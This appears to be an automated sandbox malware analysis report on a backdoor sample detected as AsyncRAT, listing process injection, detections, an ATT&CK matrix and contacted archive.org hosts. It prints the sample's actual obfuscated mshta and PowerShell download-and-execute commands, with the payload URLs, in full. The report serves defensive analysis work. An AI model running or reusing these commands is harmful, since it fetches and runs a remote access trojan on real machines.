          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 value starts with: 4D5A
          Writes to foreign memory regionsShow sources
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 402000
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 40E000
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 410000
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 923008
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 402000
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 404000
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 406000
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: DA9008
          Source: C:\Users\user\Desktop\xGrfj8RvYg.exeProcess created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' https://ia601502.us.archive.org/2/items/clean-lol-123_20210603/Clean_lol123.txt
          Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $TTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTT ='https://ia601509.us.archive.org/21/items/all-lol-123_20210603/ALL_lol123.TXT';$SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS='Down^^^^^^^^^^^^^string'.Replace('^^^^^^^^^^^^^','load');$OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO = 'WebBANKnt'.Replace('BANK','Clie');$T4RDTHFTJGJKHL='WFt'.Replace('WF','NE');$EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE='(NewYEAe'.Replace('YEA','-Obj');$FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF='ct System.$T4RDTHFTJGJKHL.$OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO).$SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS($TTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTT)';I`E`X ($EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE,$FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF -Join '')|I`E`X
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -windo 1 -noexit -exec bypass -file C:\Users\Public\-----Run+++++++++.ps1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
          Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $TTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTT ='https://ia601509.us.archive.org/21/items/all-lol-123_20210603/ALL_lol123.TXT';$SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS='Down^^^^^^^^^^^^^string'.Replace('^^^^^^^^^^^^^','load');$OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO = 'WebBANKnt'.Replace('BANK','Clie');$T4RDTHFTJGJKHL='WFt'.Replace('WF','NE');$EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE='(NewYEAe'.Replace('YEA','-Obj');$FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF='ct System.$T4RDTHFTJGJKHL.$OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO).$SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS($TTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTT)';I`E`X ($EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE,$FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF -Join '')|I`E`X
          Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $TTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTT ='https://ia601509.us.archive.org/21/items/all-lol-123_20210603/ALL_lol123.TXT';$SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS='Down^^^^^^^^^^^^^string'.Replace('^^^^^^^^^^^^^','load');$OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO = 'WebBANKnt'.Replace('BANK','Clie');$T4RDTHFTJGJKHL='WFt'.Replace('WF','NE');$EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE='(NewYEAe'.Replace('YEA','-Obj');$FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF='ct System.$T4RDTHFTJGJKHL.$OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO).$SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS($TTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTT)';I`E`X ($EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE,$FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF -Join '')|I`E`X
          Source: powershell.exe, 00000003.00000002.470709255.0000027D85B90000.00000002.00000001.sdmp, aspnet_compiler.exe, 00000017.00000002.471299747.0000000002C3C000.00000004.00000001.sdmp, aspnet_compiler.exe, 00000019.00000002.469212629.00000000018D0000.00000002.00000001.sdmpBinary or memory string: Program Manager
          Source: powershell.exe, 00000003.00000002.470709255.0000027D85B90000.00000002.00000001.sdmp, aspnet_compiler.exe, 00000017.00000002.470083278.00000000014C0000.00000002.00000001.sdmp, aspnet_compiler.exe, 00000019.00000002.469212629.00000000018D0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: powershell.exe, 00000003.00000002.470709255.0000027D85B90000.00000002.00000001.sdmp, aspnet_compiler.exe, 00000017.00000002.470083278.00000000014C0000.00000002.00000001.sdmp, aspnet_compiler.exe, 00000019.00000002.469212629.00000000018D0000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: powershell.exe, 00000003.00000002.470709255.0000027D85B90000.00000002.00000001.sdmp, aspnet_compiler.exe, 00000017.00000002.470083278.00000000014C0000.00000002.00000001.sdmp, aspnet_compiler.exe, 00000019.00000002.469212629.00000000018D0000.00000002.00000001.sdmpBinary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\xGrfj8RvYg.exeQueries volume information: C:\Users\user\Desktop\xGrfj8RvYg.exe VolumeInformation
          Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
          Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
          Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
          Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\1.2\Microsoft.PowerShell.PSReadline.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe VolumeInformation
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe VolumeInformation
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Lowering of HIPS / PFW / Operating System Security Settings:

          barindex
          Yara detected AsyncRATShow sources
          Source: Yara matchFile source: 00000017.00000000.310047645.0000000000402000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000017.00000002.467029735.0000000000402000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000017.00000002.470750040.0000000002BE1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: aspnet_compiler.exe PID: 6396, type: MEMORY
          Source: Yara matchFile source: 23.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 23.0.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsWindows Management Instrumentation1DLL Side-Loading1DLL Side-Loading1Disable or Modify Tools1OS Credential DumpingFile and Directory Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel12Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsCommand and Scripting Interpreter11Scheduled Task/Job1Process Injection212Deobfuscate/Decode Files or Information1LSASS MemorySystem Information Discovery14Remote Desktop ProtocolEmail Collection1Exfiltration Over BluetoothNon-Standard Port1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsScheduled Task/Job1Registry Run Keys / Startup Folder1Scheduled Task/Job1Obfuscated Files or Information11Security Account ManagerQuery Registry1SMB/Windows Admin SharesClipboard Data1Automated ExfiltrationNon-Application Layer Protocol1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Registry Run Keys / Startup Folder1Software Packing1NTDSSecurity Software Discovery121Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol2SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptTimestomp1LSA SecretsProcess Discovery2SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonDLL Side-Loading1Cached Domain CredentialsVirtualization/Sandbox Evasion31VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsMasquerading1DCSyncApplication Window Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobVirtualization/Sandbox Evasion31Proc FilesystemRemote System Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
          Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Process Injection212/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          xGrfj8RvYg.exe9%ReversingLabsByteCode-MSIL.Backdoor.Crysan

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          23.2.aspnet_compiler.exe.400000.0.unpack100%AviraTR/Dropper.GenDownload File
          23.0.aspnet_compiler.exe.400000.0.unpack100%AviraHEUR/AGEN.1121262Download File
          25.2.aspnet_compiler.exe.400000.0.unpack100%AviraHEUR/AGEN.1137914Download File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://crl.microsoft0%URL Reputationsafe
          http://crl.microsoft0%URL Reputationsafe
          http://crl.microsoft0%URL Reputationsafe
          https://contoso.com/License0%URL Reputationsafe
          https://contoso.com/License0%URL Reputationsafe
          https://contoso.com/License0%URL Reputationsafe
          https://ia601406.us.archive.org80%Avira URL Cloudsafe
          https://contoso.com/0%URL Reputationsafe
          https://contoso.com/0%URL Reputationsafe
          https://contoso.com/0%URL Reputationsafe
          https://ia803408.us.archive.orgx0%Avira URL Cloudsafe
          http://crl.goi0%Avira URL Cloudsafe
          https://archive.orgx0%Avira URL Cloudsafe
          http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
          http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
          http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
          http://microsoft.co0%URL Reputationsafe
          http://microsoft.co0%URL Reputationsafe
          http://microsoft.co0%URL Reputationsafe
          https://go.micro0%URL Reputationsafe
          https://go.micro0%URL Reputationsafe
          https://go.micro0%URL Reputationsafe
          https://contoso.com/Icon0%URL Reputationsafe
          https://contoso.com/Icon0%URL Reputationsafe
          https://contoso.com/Icon0%URL Reputationsafe
          https://ia601406.us.archive.orgx0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          ia601406.us.archive.org
          		207.241.227.126
          		truefalse
            		high
            ia601509.us.archive.org
            		207.241.227.119
            		truefalse
              		high
              archive.org
              		207.241.224.2
              		truefalse
                		high
                ia601502.us.archive.org
                		207.241.227.112
                		truefalse
                  		high
                  ia803408.us.archive.org
                  		207.241.232.198
                  		truefalse
                    		high

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    https://ia601509.us.archive.org/powershell.exe, 00000003.00000003.210047788.0000027D9F8AB000.00000004.00000001.sdmpfalse
                      		high
                      https://ia601502.us.archive.org/2/items/clean-lol-123_20210603/Clean_lol123.txt...7lmshta.exe, 00000002.00000002.216688146.0000020091B21000.00000004.00000020.sdmpfalse
                        		high
                        http://crl.microsoftpowershell.exe, 00000003.00000002.484556145.0000027D9F8E4000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        		unknown
                        http://ia803408.us.archive.orgpowershell.exe, 00000003.00000002.478315679.0000027D87F6F000.00000004.00000001.sdmpfalse
                          		high
                          http://certificates.godaddy.com/repository/0mshta.exe, 00000002.00000002.216634769.0000020091AF8000.00000004.00000020.sdmp, powershell.exe, 00000003.00000002.477549946.0000027D87D00000.00000004.00000001.sdmpfalse
                            		high
                            https://contoso.com/Licensepowershell.exe, 00000003.00000002.482180457.0000027D97365000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            		unknown
                            https://ia601502.us.archive.org/2/items/clean-lol-123_20210603/Clean_lol123.txt...mshta.exe, 00000002.00000002.216688146.0000020091B21000.00000004.00000020.sdmpfalse
                              		high
                              https://ia601502.us.archive.org/2/items/clean-lol-123_20210603/Clean_lol123.txt1mshta.exe, 00000002.00000002.216487813.0000020091A30000.00000004.00000020.sdmpfalse
                                		high
                                https://ia601406.us.archive.org8powershell.exe, 00000003.00000002.478315679.0000027D87F6F000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://archive.orgpowershell.exe, 00000003.00000002.478315679.0000027D87F6F000.00000004.00000001.sdmpfalse
                                  		high
                                  https://ia601502.us.archive.org/2/items/clean-lol-123_20210603/Clean_lol123.txt0mshta.exe, 00000002.00000002.216487813.0000020091A30000.00000004.00000020.sdmpfalse
                                    		high
                                    http://ia601406.us.archive.orgpowershell.exe, 00000003.00000002.478183437.0000027D87F0E000.00000004.00000001.sdmpfalse
                                      		high
                                      https://ia601406.us.archive.org/32/items/run-02-02-02/Run_02_02_02.TXTpowershell.exe, 00000003.00000002.484398533.0000027D9F8A2000.00000004.00000001.sdmp, powershell.exe, 00000003.00000002.478105936.0000027D87EC6000.00000004.00000001.sdmp, powershell.exe, 00000003.00000002.477673861.0000027D87D1D000.00000004.00000001.sdmpfalse
                                        		high
                                        https://ia601406.us.archive.org/9/items/server-lol-123_20210603/Server_lol123.txtpowershell.exe, 00000003.00000002.477549946.0000027D87D00000.00000004.00000001.sdmpfalse
                                          		high
                                          https://contoso.com/powershell.exe, 00000003.00000002.482180457.0000027D97365000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          		unknown
                                          https://nuget.org/nuget.exepowershell.exe, 00000003.00000002.482180457.0000027D97365000.00000004.00000001.sdmpfalse
                                            		high
                                            https://ia601509.us.archive.org/21/items/all-lol-123_20210603/ALmshta.exe, mshta.exe, 00000002.00000002.217899024.0000020893D10000.00000004.00000001.sdmpfalse
                                              		high
                                              https://ia803408.us.archive.orgpowershell.exe, 00000003.00000002.478315679.0000027D87F6F000.00000004.00000001.sdmpfalse
                                                		high
                                                https://ia803408.us.archive.orgxpowershell.exe, 00000003.00000002.478315679.0000027D87F6F000.00000004.00000001.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://crl.goimshta.exe, 00000002.00000002.217675863.0000020893C10000.00000004.00000001.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://certificates.godaddy.com/repository/gdig2.crt0mshta.exe, 00000002.00000002.216634769.0000020091AF8000.00000004.00000020.sdmp, powershell.exe, 00000003.00000002.477549946.0000027D87D00000.00000004.00000001.sdmpfalse
                                                  		high
                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000003.00000002.472135094.0000027D871C1000.00000004.00000001.sdmp, aspnet_compiler.exe, 00000017.00000002.470750040.0000000002BE1000.00000004.00000001.sdmpfalse
                                                    		high
                                                    http://nuget.org/NuGet.exepowershell.exe, 00000003.00000002.482180457.0000027D97365000.00000004.00000001.sdmpfalse
                                                      		high
                                                      https://archive.orgxpowershell.exe, 00000003.00000002.478315679.0000027D87F6F000.00000004.00000001.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://crl.godaddy.com/gdig2s1-1597.crl0mshta.exe, 00000002.00000002.216634769.0000020091AF8000.00000004.00000020.sdmp, powershell.exe, 00000003.00000002.477549946.0000027D87D00000.00000004.00000001.sdmpfalse
                                                        		high
                                                        http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000003.00000002.472681637.0000027D873CF000.00000004.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        		unknown
                                                        https://ia601502.us.archive.org/2/items/clean-lol-123_20210603/Clean_lol123.txtst-MC:mshta.exe, 00000002.00000002.216660984.0000020091B0A000.00000004.00000020.sdmpfalse
                                                          		high
                                                          http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000003.00000002.472681637.0000027D873CF000.00000004.00000001.sdmpfalse
                                                            		high
                                                            http://microsoft.copowershell.exe, 00000003.00000002.484556145.0000027D9F8E4000.00000004.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            		unknown
                                                            https://go.micropowershell.exe, 00000003.00000002.480627087.0000027D88C97000.00000004.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            		unknown
                                                            http://certs.godaddy.com/repository/1301mshta.exe, 00000002.00000002.216660984.0000020091B0A000.00000004.00000020.sdmp, powershell.exe, 00000003.00000002.469024271.0000027D856CD000.00000004.00000020.sdmpfalse
                                                              		high
                                                              https://contoso.com/Iconpowershell.exe, 00000003.00000002.482180457.0000027D97365000.00000004.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              		unknown
                                                              https://ia601502.us.archive.org/2/items/clean-lol-123_20210603/Clean_lol123.txtsmshta.exe, 00000002.00000002.216764785.0000020091CE0000.00000004.00000040.sdmpfalse
                                                                		high
